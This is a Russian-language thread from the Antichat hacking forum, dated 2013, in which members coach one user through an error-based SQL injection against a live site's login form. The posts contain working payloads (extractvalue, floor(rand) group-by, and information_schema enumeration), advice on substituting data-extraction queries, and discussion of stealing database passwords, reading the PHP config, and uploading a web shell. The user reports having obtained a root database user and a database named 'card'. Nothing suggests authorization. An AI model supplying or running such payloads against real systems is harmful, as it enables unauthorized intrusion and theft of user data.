HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.10.2013, 19:58
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
Если на \, реагирует то весь участков, вплоть до пароля можно выставить как логин.
login=admin\&password= or extractvalue(1,concat(0x3b, user())) -- t
уже ближе..

что то еще нужно(

 
Ответить с цитированием

  #2  
Старый 03.10.2013, 20:05
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Если и прокатит, то можно с юнионом поиграться, если нет -

login=admin\&password= or(select 11 from information_schema.tables group by concat(user(),0x3b,version(),floor(rand(0)*2)) having count(*)) -- t
 
Ответить с цитированием

  #3  
Старый 03.10.2013, 20:08
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
Если и прокатит, то можно с юнионом поиграться, если нет -
login=admin\&password= or(select 11 from information_schema.tables group by concat(user(),0x3b,version(),floor(rand(0)*2)) having count(*)) -- t


Другая ошибка, но что то не хочет тоже
 
Ответить с цитированием

  #4  
Старый 03.10.2013, 20:10
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от zombak18  
уже ближе..
что то еще нужно(

Так вот ты через ошибку вывел нужный тебе результат то: root@192.168.8.64
 
Ответить с цитированием

  #5  
Старый 03.10.2013, 20:13
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Цитата:
Сообщение от Melfis  
Так вот ты через ошибку вывел нужный тебе результат то:
root@192.168.8.64
Зачем мне логин и айпи с локалхоста)

Нужно либо получить название/пароли из бд

либо конфиг с php файла на самом сайте
 
Ответить с цитированием

  #6  
Старый 03.10.2013, 20:32
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от zombak18  
Зачем мне логин и айпи с локалхоста)
Нужно либо получить название/пароли из бд
либо конфиг с php файла на самом сайте
За тем,что все у вас на виду!

Пробуйте:

Цитата:
Сообщение от None  
select+count(*),concat((select +table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x
 
Ответить с цитированием

  #7  
Старый 03.10.2013, 20:33
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
За тем,что все у вас на виду!
Пробуйте:


неа(

ах да либо запрос на загрузку шелла тоже вариант)
 
Ответить с цитированием

  #8  
Старый 03.10.2013, 20:39
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от zombak18  
Зачем мне логин и айпи с локалхоста)
Нужно либо получить название/пароли из бд
либо конфиг с php файла на самом сайте
Потому что ты неправильно используешь error base sqlinj

http://clip.corp.mail.ru/clip/m517/1380812270-clip-20kb-fvNTIqJO3gz2.png

Вот ты использовал и выбрал user(), под которым скрипт получает доступ в базу, тебе он и отобразился. Причём юзер рутовый. Вместо user() и подставляй свои операции по выборке из базы.

Цитата:
Сообщение от zombak18  

неа(
ах да либо запрос на загрузку шелла тоже вариант)
Не вариант, потому что чтобы прогрузить шелл - надо чтобы кавычки не фильтровались. Ты хотя бы читай и анализируй что ты делаешь. В примере, что тебе дали у тебя стоит после select +, который не преобразовался в пробел, замени его.
 
Ответить с цитированием

  #9  
Старый 03.10.2013, 20:49
zombak18
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами: 7690646

Репутация: 0
По умолчанию

Цитата:
Сообщение от Melfis  
Потому что ты неправильно используешь error base sqlinj
http://clip.corp.mail.ru/clip/m517/1380812270-clip-20kb-fvNTIqJO3gz2.png
Вот ты использовал и выбрал user(), под которым скрипт получает доступ в базу, тебе он и отобразился. Причём юзер рутовый. Вместо user() и подставляй свои операции по выборке из базы.
Не вариант, потому что чтобы прогрузить шелл - надо чтобы кавычки не фильтровались. Ты хотя бы читай и анализируй что ты делаешь. В примере, что тебе дали у тебя стоит после select
+
, который не преобразовался в пробел, замени его.
Эх да ' фильтрует(

Да с пробелом и без пробовал.. всё равно та же ошибка

http://clip.corp.mail.ru/clip/m517/1380815456-clip-22kb-sVmu65bUCDSD.png

/название бд достал card
 
Ответить с цитированием

  #10  
Старый 03.10.2013, 21:10
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Цитата:
Сообщение от zombak18  

неа(
ах да либо запрос на загрузку шелла тоже вариант)
Всё, что идёт перед select+count.. должно быть или после юниона, или в скобках после какого-либо оператора(or,and т.д) и желательно с row().

Как уже говорили, апострофы фильтруются, без них и без полного пути к каталогу с сайтом, шелл не реально залить)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.